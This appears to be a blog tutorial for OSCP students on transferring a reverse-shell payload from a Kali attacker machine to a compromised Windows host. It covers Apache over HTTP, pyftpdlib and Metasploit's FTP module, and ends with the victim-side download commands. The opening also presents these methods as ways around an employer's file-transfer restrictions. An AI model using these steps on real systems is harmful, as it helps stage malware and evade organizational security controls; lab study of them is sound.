OCSP: FILE TRANSFER RECIPE FOR DELICIOUS POST EXPLOITATION

Wasim Shaikh
Jun 19 · 9 min read

This article is basically for all those people who are working in Infosec. Because when as an Infosec you work in any organization, the organization (obviously SOC guys!) restricts you/ will make your work more difficult. Few of the difficulties such as accessing files, installing software on your system, accessing the internet, restricted use of emails, restriction on the use of shared folders and transferring files between machines. Sometimes it is very annoying when you want to finish your work as soon as possible you can but you are stuck at the point where you can not transfer a file from one PC to another to complete the task because of policies of the organization. In that case, you should be smart enough to know more than one or two ways of file sharing methodologies. Today, I am going to share some of them widely used by Infosec community, especially Offensive Community.

This article is dedicated to all my friends, colleagues who are OSCP (Offensive Security Certified Professional) aspirant and looking for end to end, top to bottom, consolidated at one place methods of sharing files to another computer from their own Kali Linux Machine. In OSCP, file transfer comes in the picture once you have access to the remote machine, and you want to exploit it further for taking highest level privileges. Thus, instead of searching for different places on internet and books to get different ways, I have consolidated almost all the methods (methods which are simple and you don’t need to write any script for it) required to transfer files to victim’s machine. I have given emphasis to make sure readers should understand each and every aspect (simple to difficult steps) in one-time reading.

Basically, there are five ways I am going to explain today. Before starting, I want to give you the preamble to understand this write-up better.

Attacker’s Machine: Your local machine (Linux Machine).
This is the Kali Linux machine, the attacker is using it to perform an attack.

Victim’s Machine: Remote computer.
This is the remote machine which belongs to a victim. It is Windows XP/Windows 7, an attacker has got some level of access to it.

File Transferred: reverse_shell.exe
This is the file we are going to transfer as an example from the Attacker’s machine to a Victim’s machine.
For every protocol (every method that I am going to share), we are going to learn it in two phases A and B.

Step A: Setting server on the Attacker’s machine
I am going to explain what are the prerequisites you should have to set a server (to host a server). Many times it is possible that server we want to use has no setup or not installed on the attacker’s machine. In this step, I will explain how to gather information to find whether server set up is there on the machine installed or not. If not installed, what to do and how to install.

A.1: Finding a local directory of the server
A local directory is a place where you will keep all the files/payloads that you want to transfer to the victim’s machine. When you want to transfer files to the victim’s machine from the attacker’s machine using any protocol, first you need to keep all those files at one place (known as a local directory of a server) so that you can access them from the remote machine.

A.2: Starting/ Running Server
This is the next step. Once the server is installed and available to run. In this step, I will explain commands to run and start the server.

Step B: Downloading files on Victim’s machine
This will be the final step. In this step, I will explain, how to download files to the victim’s machine from the attacker’s machine.

Following are the methodologies used for file transfer,

However, in PART: 1, we will see the first two. To read the remaining methods, please visit: https://medium.com/@dr.spitfire/ocsp-file-transfer-recipe-for-delicious-post-exploitation-a407e00f7346?source=friends_link&sk=cb690ce087469c9effbc699d6b1b1370

HTTP is known as HyperText Transfer Protocol. It runs on port 80. Transferring files using the HTTP protocol is pretty straight forward.

Step A: Setting a Server on the Attacker’s Machine

As I mentioned earlier, I will share step by step procedure. Thus, the first step is finding the local directory and storing all the files that we want to transfer to the victim’s machine into that local directory of the server.

A.1: Finding a local directory of a server

Here we are going to use an Apache server. Apache server comes by default in Kali Linux. Thus, no need to install anything. All you need to do is starting/running it. However, the default local directory for Apache web server is located at /var/www/html. Thus, you need to keep all those payloads/files you want to transfer to the victim’s machine in this local directory. As shown below, I have kept my file “reverse_shell.exe” in that local directory.
Use dir command to see all the files/folders.

root@kali:~# cd /var/www/html root@kali:~# dir

A.2: Starting/ Running a server

As I mentioned earlier, Kali Linux comes with default Apache server. All you need is one command to run it. Hit the below command in Kali terminal and your Apache web server will be running,

Please note, the IP Address where I have started Apache web server is 192.168.1.14

Step B: Downloading Files on Victim’s Machine

The very easy step is now to download the files on a victim’s machine. Here I am considering, you have gain access to the victim’s machine and you can access the browser. Open the browser on victim’s machine and type below URL,

http://IP_Address_Of_Attacker's_Machine/reverse_shell.exe

http://192.168.1.14/reverse_shell.exe

You will be able to save the file on the victim’s machine. Please refer below screenshot.

Thus, described above is the simple way of transferring files between machines using the simple HTTP protocol.

2. Using FTP Protocol
FTP is known as File Transfer Protocol. FTP protocol uses port number 21.
Step A: Setting a Server on the Attacker’s Machine
Setting a server using FTP is as simple as HTTP. In the case of FTP, there is more than one way of starting/setting a server in Kali Linux machine. And depending on the way I am setting a server, my local directory will change. So, the first method is using Python’s ftpd library server and the second way is using Metasploit’s auxiliary module of FTP. We will see one by one.
A.1: Finding local Directory of Server.
In the case of the FTP protocol, the local directory will change according to the place where you will start the FTP module. If you are using Python’s FTP Server Library known as “pyftpdlib” in Kali Linux, it will be at the place where you are starting the module of Python. If you are starting a module at the root directory, the local directory will be the root directory of Kali Linux machine, /root/, if you are starting the module at some location like, /root/documents/ then the local directory will be /root/documents. I will try to clarify it better by the below examples and screenshots.
Starting Python FTP Server Library module at /root directory:
In order to run pyftpdlib module, first, you need to check whether that module is installed on my machine or not. Even if python is installed on your Kali Linux, does not mean this module will be there. Python does not come with the pyftpdlib module by default. In order to check any module/file, we can use the locate command. Please refer below screenshot.
root@kali:/# locate pyftpdlib

If it is installed, you will get many files/libraries names showing the module name in the output of the command in the terminal. If the pyftpdlib module is not installed, you can install it using below commands,
root@kali:~# apt-get install python-pyftpdlib
While installing any module, Kali Linux installs some files/ other packages that are not needed on your machine after the installation of the respective module. You can remove it using below command,
root@kali:~# apt autoremove
I suppose you have Python’s ftpdlib module installed on the machine. So to check for the local directory where we can keep the files that we want to send to the victim’s machine, we will run the server and check the local directory from the victim’s machine. Basically, this step will come when we are logged in using anonymous user and we are connected using FTP. At that time, from victim’s machine, we can check what is the local directory of this FTP server and what are the files kept in it.
But I will explain it briefly here,
To start the server from the root directory of Kali Linux, use below command,
root@kali:~# python -m pyftpdlib -p 21

Now, check from the victim’s machine where is the local directory for the respective FTP Server. To check, take the connection from victim machine and use dir command.
C:\WINDOWS\system32>ftp IP_Address
C:\WINDOWS\system32>ftp 192.168.1.14
Login using anonymous:any_password. Check the directory. Please refer below screenshot. Given below is the screenshot from victim’s machine displaying local directory as /root directory of Kali Linux machine.

Now, we will change the location from where we had started the ftpdlib server. And accordingly, the location of the local directory will change.

To change the directory in Kali Linux we use the cd command. I changed to the following directory and started the Python ftpdlib server at that location. Even I have listed all the folders/files at the respective location where I am starting the tftpd server. Please refer below screenshot.

Let me show you the directory where I am supposed to keep files has been changed. I can verify using dir command from the victim’s machine. Please refer below screenshot.

Thus, in case of starting and running server using Python’s ftpdlib, we are clear that the local directory where we are supposed to keep files that we want to transfer to the victim’s machine changes with the location where we are starting the ftpdlib. Hence, before starting the ftpdlib module, go to the respective location where you have kept all the data to be transferred on a remote machine, and run the Python’s ftpdlib.

Starting Metasploit’s FTP Module at root directory:

However, this is not the case when you use FTP auxiliary module of Metasploit. When you use the FTP auxiliary module of Metasploit, you can specify the local directory explicitly. Please refer below commands,

Start Metasploit using below command,

Set the port, IP and local directory here.

Now, I have explained the different ways of finding and keeping files in the local directory. And even I have given the idea about how to set a server and start it to make it accessible from the victim’s machine. Let me explain briefly, how to run the server.

A.2: Starting/ Running a Server

Starting and running a server using Python ftpdlib module is very simple and easy. Use below command to start a server.

root@kali:~# python -m pyftpdlib -p 21 (You can specify any port number. However, 21 is default).

Starting and running a server using Metasploit’s FTP module is also very simple. Follow below command,

msf > use auxiliary/server/ftp

msf auxiliary(server/ftp) > options (set port, IP address, and directory)

msf auxiliary(server/ftp) > set TFTPROOT /root/usr (/root/usr is a root directory I have set to keep files).

msf auxiliary(server/ftp) > run

Step B: Downloading Files on Victim’s Machine

Downloading files on the victim’s machine using FTP is as simple as other methods we have seen. Start FTP on the victim’s machine. Login using Anonymous user and any password. Use get command to download the file from the attacker’s machine to the victim machine.

C:\WINDOWS\system32>ftp IP_Address

C:\WINDOWS\system32>ftp 192.168.1.14

FTP> get reverse_shell.exe

After get command, you will have the reverse_shell.exe file on the victim’s machine. Location of the reverse_shell.exe file will be the same from where you have started FTP.

Please visit below link to read PART 2 of this write-up!

Link: https://medium.com/@dr.spitfire/ocsp-file-transfer-recipe-for-delicious-post-exploitation-a407e00f7346?sk=cb690ce087469c9effbc699d6b1b1370

You can follow me on Twitter: https://twitter.com/Wa_sim_sim

Wasim Shaikh

Written by

Security Consultant; Ethical Hacker; Penetration Tester; Bug Bounty Hunter; A son; A brother; A friend! Twitter: @Wa_sim_sim